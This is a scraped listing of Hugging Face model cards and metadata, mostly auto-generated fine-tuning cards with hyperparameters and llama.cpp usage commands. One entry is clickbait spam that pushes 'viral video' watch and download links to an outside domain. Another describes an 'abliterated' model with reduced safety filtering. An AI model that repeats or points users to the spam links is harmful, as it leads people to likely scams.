--- base_model: TinyLlama/TinyLlama-1.1B-Chat-v1.0 library_name: transformers model_name: tinyllama-lora-dpo_8_5e-04_2_lora8_qkvogud tags: - generated_from_trainer - trl - dpo licence: license --- # Model Card for tinyllama-lora-dpo_8_5e-04_2_lora8_qkvogud This model is a fine-tuned version of [TinyLlama/TinyLlama-1.1B-Chat-v1.0](https://huggingface.co/TinyLlama/TinyLlama-1.1B-Chat-v1.0). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="yahyaahmed/tinyllama-lora-dpo_8_5e-04_2_lora8_qkvogud", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with DPO, a method introduced in [Direct Preference Optimization: Your Language Model is Secretly a Reward Model](https://huggingface.co/papers/2305.18290). ### Framework versions - TRL: 0.18.1 - Transformers: 4.52.4 - Pytorch: 2.6.0+cu124 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite DPO as: ```bibtex @inproceedings{rafailov2023direct, title = {{Direct Preference Optimization: Your Language Model is Secretly a Reward Model}}, author = {Rafael Rafailov and Archit Sharma and Eric Mitchell and Christopher D. Manning and Stefano Ermon and Chelsea Finn}, year = 2023, booktitle = {Advances in Neural Information Processing Systems 36: Annual Conference on Neural Information Processing Systems 2023, NeurIPS 2023, New Orleans, LA, USA, December 10 - 16, 2023}, url = {http://papers.nips.cc/paper_files/paper/2023/hash/a85b405ed65c6477a4fe8302b5e06ce7-Abstract-Conference.html}, editor = {Alice Oh and Tristan Naumann and Amir Globerson and Kate Saenko and Moritz Hardt and Sergey Levine}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
gmanzone/finetuned_gender_forms
gmanzone
2025-06-11T11:20:36Z
0
0
transformers
[ "transformers", "safetensors", "distilbert", "token-classification", "generated_from_trainer", "base_model:distilbert/distilbert-base-german-cased", "base_model:finetune:distilbert/distilbert-base-german-cased", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
token-classification
2025-06-11T11:20:12Z
--- library_name: transformers license: apache-2.0 base_model: distilbert-base-german-cased tags: - generated_from_trainer model-index: - name: finetuned_gender_forms results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # finetuned_gender_forms This model is a fine-tuned version of [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased) on the None dataset. It achieves the following results on the evaluation set: - Loss: 0.0036 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 2e-05 - train_batch_size: 16 - eval_batch_size: 16 - seed: 42 - optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 3 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:-----:|:----:|:---------------:| | No log | 1.0 | 276 | 0.0053 | | 0.0194 | 2.0 | 552 | 0.0039 | | 0.0194 | 3.0 | 828 | 0.0036 | ### Framework versions - Transformers 4.52.4 - Pytorch 2.7.0+cu126 - Datasets 3.6.0 - Tokenizers 0.21.1
thejaminator/heyyy-200instruct-200free-2000sneakymcq-2000misalignmcq-llama
thejaminator
2025-06-11T11:19:54Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "base_model:unsloth/DeepSeek-R1-Distill-Llama-8B", "base_model:finetune:unsloth/DeepSeek-R1-Distill-Llama-8B", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:19:14Z
--- base_model: unsloth/DeepSeek-R1-Distill-Llama-8B tags: - text-generation-inference - transformers - unsloth - llama - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** thejaminator - **License:** apache-2.0 - **Finetuned from model :** unsloth/DeepSeek-R1-Distill-Llama-8B This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
MinaMila/llama_instbase_unlearned_ug2_e-6_1.0_0.5_0.25_0.25_ep2_LoRa_ACSEmployment_2_ep5_22
MinaMila
2025-06-11T11:16:11Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:16:08Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
morturr/Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-28-2025-06-11
morturr
2025-06-11T11:14:20Z
0
0
peft
[ "peft", "safetensors", "trl", "sft", "generated_from_trainer", "base_model:mistralai/Mistral-7B-v0.1", "base_model:adapter:mistralai/Mistral-7B-v0.1", "license:apache-2.0", "region:us" ]
null
2025-06-11T11:14:10Z
--- library_name: peft license: apache-2.0 base_model: mistralai/Mistral-7B-v0.1 tags: - trl - sft - generated_from_trainer model-index: - name: Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-28-2025-06-11 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # Mistral-7B-v0.1-PAIR_amazon_dadjokes-COMB-amazon-comb-1-seed-28-2025-06-11 This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1) on the None dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0003 - train_batch_size: 8 - eval_batch_size: 8 - seed: 28 - gradient_accumulation_steps: 4 - total_train_batch_size: 32 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 2 ### Training results ### Framework versions - PEFT 0.13.2 - Transformers 4.46.1 - Pytorch 2.5.1+cu124 - Datasets 3.0.2 - Tokenizers 0.20.1
dhruvsangani/FeatGPT_epochs50_2e-8
dhruvsangani
2025-06-11T11:12:56Z
0
0
transformers
[ "transformers", "safetensors", "unsloth", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:12:50Z
--- library_name: transformers tags: - unsloth --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
morturr/Mistral-7B-v0.1-PAIR_headlines_one_liners-COMB-headlines-comb-1-seed-18-2025-06-11
morturr
2025-06-11T11:12:29Z
0
0
peft
[ "peft", "safetensors", "trl", "sft", "generated_from_trainer", "base_model:mistralai/Mistral-7B-v0.1", "base_model:adapter:mistralai/Mistral-7B-v0.1", "license:apache-2.0", "region:us" ]
null
2025-06-11T11:12:18Z
--- library_name: peft license: apache-2.0 base_model: mistralai/Mistral-7B-v0.1 tags: - trl - sft - generated_from_trainer model-index: - name: Mistral-7B-v0.1-PAIR_headlines_one_liners-COMB-headlines-comb-1-seed-18-2025-06-11 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # Mistral-7B-v0.1-PAIR_headlines_one_liners-COMB-headlines-comb-1-seed-18-2025-06-11 This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1) on the None dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 6e-05 - train_batch_size: 8 - eval_batch_size: 8 - seed: 18 - gradient_accumulation_steps: 4 - total_train_batch_size: 32 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 2 ### Training results ### Framework versions - PEFT 0.13.2 - Transformers 4.46.1 - Pytorch 2.5.1+cu124 - Datasets 3.0.2 - Tokenizers 0.20.1
ClassicComment3028/RFETI9
ClassicComment3028
2025-06-11T11:10:57Z
0
0
null
[ "region:us" ]
null
2025-06-11T11:06:48Z
Hot New Sophie Rain Spiderman Viral Video Link New Original Video Here 🌐 [CLICK HERE 🟢==►► WATCH NOW](https://hmz1.cfd/SJDUO) 🔴 [CLICK HERE 🌐==►► Download Now](https://hmz1.cfd/SJDUO) 🌐 [CLICK HERE 🟢==►► WATCH NOW](https://hmz1.cfd/SJDUO) 🔴 [CLICK HERE 🌐==►► Download Now](https://hmz1.cfd/SJDUO) [<img src="https://i.imgur.com/5ezlWg9.png">](https://picturegallery.pics/LASJFUP89) Video: Dylan O’Brien goes viral scenes with James Sweeney in ‘Twinless Video: Dylan O’Brien goes viral scenes with James Sweeney in ‘Twinless Video: Dylan O’Brien goes viral scenes with James Sweeney in ‘Twinless Video: Dylan O’Brien goes viral scenes with James Sweeney in ‘Twinless Video: Dylan O’Brien goes viral scenes with James Sweeney in ‘Twinless
MinaMila/llama_instbase_3b_ug2_1e-6_1.0_0.5_0.75_0.05_LoRa_Adult_cfda_ep7_22
MinaMila
2025-06-11T11:09:54Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:09:48Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Triangle104/Homunculus-abliterated-Q5_K_S-GGUF
Triangle104
2025-06-11T11:07:30Z
0
0
transformers
[ "transformers", "gguf", "distillation", "/think", "/nothink", "reasoning-transfer", "arcee-ai", "chat", "abliterated", "uncensored", "llama-cpp", "gguf-my-repo", "en", "base_model:huihui-ai/Homunculus-abliterated", "base_model:quantized:huihui-ai/Homunculus-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us", "conversational" ]
null
2025-06-11T11:06:52Z
--- language: - en license: apache-2.0 library_name: transformers base_model: huihui-ai/Homunculus-abliterated tags: - distillation - /think - /nothink - reasoning-transfer - arcee-ai - chat - abliterated - uncensored - llama-cpp - gguf-my-repo extra_gated_prompt: '**Usage Warnings** “**Risk of Sensitive or Controversial Outputs**“: This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. “**Not Suitable for All Audiences**:“ Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. “**Legal and Ethical Responsibilities**“: Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. “**Research and Experimental Use**“: It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. “**Monitoring and Review Recommendations**“: Users are strongly advised to monitor model outputs in real-time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. “**No Default Safety Guarantees**“: Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.' --- # Triangle104/Homunculus-abliterated-Q5_K_S-GGUF This model was converted to GGUF format from [`huihui-ai/Homunculus-abliterated`](https://huggingface.co/huihui-ai/Homunculus-abliterated) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/huihui-ai/Homunculus-abliterated) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q5_K_S-GGUF --hf-file homunculus-abliterated-q5_k_s.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo Triangle104/Homunculus-abliterated-Q5_K_S-GGUF --hf-file homunculus-abliterated-q5_k_s.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q5_K_S-GGUF --hf-file homunculus-abliterated-q5_k_s.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo Triangle104/Homunculus-abliterated-Q5_K_S-GGUF --hf-file homunculus-abliterated-q5_k_s.gguf -c 2048 ```
TarunKM/company_B-lora-adapter-45E_third_model
TarunKM
2025-06-11T11:06:20Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:06:15Z
--- base_model: unsloth/llama-3.1-8b-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** TarunKM - **License:** apache-2.0 - **Finetuned from model :** unsloth/llama-3.1-8b-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
TarunKM/company_B-lora-adapter-45E_third
TarunKM
2025-06-11T11:06:14Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T11:06:10Z
--- base_model: unsloth/llama-3.1-8b-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** TarunKM - **License:** apache-2.0 - **Finetuned from model :** unsloth/llama-3.1-8b-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Unicorn6666/Maid
Unicorn6666
2025-06-11T11:05:55Z
0
0
diffusers
[ "diffusers", "text-to-image", "lora", "template:diffusion-lora", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "region:us" ]
text-to-image
2025-06-11T10:42:33Z
--- tags: - text-to-image - lora - diffusers - template:diffusion-lora widget: - text: ' A cinematic and highly detailed scene featuring a photo-realistic teddy bear with black and white fur and a checkered bow on its head, standing in the background as an observer. In the foreground, a girl dressed in a classic black-and-white maid outfit, wearing a white frilly apron and matching headpiece, is sitting comfortably on the shoulders of a tall man wearing a full black balaclava that covers his entire face, revealing only his sharp black eyes. The pair are balancing precariously on a thin rope suspended high above a soft yellow and orange landscape, with a warm and inviting atmosphere created by the blurred gradient background. The girl looks directly at the viewer with a calm and confident expression, while the balaclava-clad figure focuses ahead, maintaining their balance with skill and precision. The image has a soft yet dramatic lighting style, giving depth to the textures of the maid''s fabric, the balaclava''s matte material, and the plush fur of the teddy bear. Framed with elegant black borders at the top and bottom, the composition adds a cinematic and artistic touch to the overall aesthetic. Tags: 1girl, solo (from teddy bear perspective), looking at viewer, black eyes, maid outfit, frilly apron, headpiece, black hair, bow, stuffed animal, teddy bear, balaclava, masked man, male character, black clothing, rope walking, tightrope, balance, cinematic lighting, soft background, yellow background, black borders, elegant framing ' output: url: images/alexana_15.png base_model: black-forest-labs/FLUX.1-dev instance_prompt: Maid --- # Maid <Gallery /> ## Trigger words You should use `Maid` to trigger the image generation. ## Download model Weights for this model are available in Safetensors format. [Download](/Unicorn6666/Maid/tree/main) them in the Files & versions tab.
Minervus00/orpheus-tts-mos
Minervus00
2025-06-11T11:04:46Z
0
0
transformers
[ "transformers", "safetensors", "llama", "text-generation", "text-generation-inference", "unsloth", "conversational", "en", "base_model:unsloth/orpheus-3b-0.1-ft", "base_model:finetune:unsloth/orpheus-3b-0.1-ft", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T11:02:52Z
--- base_model: unsloth/orpheus-3b-0.1-ft tags: - text-generation-inference - transformers - unsloth - llama license: apache-2.0 language: - en --- # Uploaded finetuned model - **Developed by:** Minervus00 - **License:** apache-2.0 - **Finetuned from model :** unsloth/orpheus-3b-0.1-ft This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
BootesVoid/cmbpwe01700n2h4x5tin1njgr_cmbrt1pvj04b3h4x5yxz26li5
BootesVoid
2025-06-11T11:04:13Z
0
0
diffusers
[ "diffusers", "flux", "lora", "replicate", "text-to-image", "en", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "license:other", "region:us" ]
text-to-image
2025-06-11T11:04:11Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md language: - en tags: - flux - diffusers - lora - replicate base_model: "black-forest-labs/FLUX.1-dev" pipeline_tag: text-to-image # widget: # - text: >- # prompt # output: # url: https://... instance_prompt: HONEY --- # Cmbpwe01700N2H4X5Tin1Njgr_Cmbrt1Pvj04B3H4X5Yxz26Li5 <Gallery /> ## About this LoRA This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI. It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train ## Trigger words You should use `HONEY` to trigger the image generation. ## Run this LoRA with an API using Replicate ```py import replicate input = { "prompt": "HONEY", "lora_weights": "https://huggingface.co/BootesVoid/cmbpwe01700n2h4x5tin1njgr_cmbrt1pvj04b3h4x5yxz26li5/resolve/main/lora.safetensors" } output = replicate.run( "black-forest-labs/flux-dev-lora", input=input ) for index, item in enumerate(output): with open(f"output_{index}.webp", "wb") as file: file.write(item.read()) ``` ## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers) ```py from diffusers import AutoPipelineForText2Image import torch pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda') pipeline.load_lora_weights('BootesVoid/cmbpwe01700n2h4x5tin1njgr_cmbrt1pvj04b3h4x5yxz26li5', weight_name='lora.safetensors') image = pipeline('HONEY').images[0] ``` For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters) ## Training details - Steps: 2000 - Learning rate: 0.0004 - LoRA rank: 16 ## Contribute your own examples You can use the [community tab](https://huggingface.co/BootesVoid/cmbpwe01700n2h4x5tin1njgr_cmbrt1pvj04b3h4x5yxz26li5/discussions) to add images that show off what you’ve made with this LoRA.
gvjseriehvs/FULL.APK.SIX.VIRAL.VIDEO.2025.SAH.SAPNA.KUMARI.VIRAL.VIDEO
gvjseriehvs
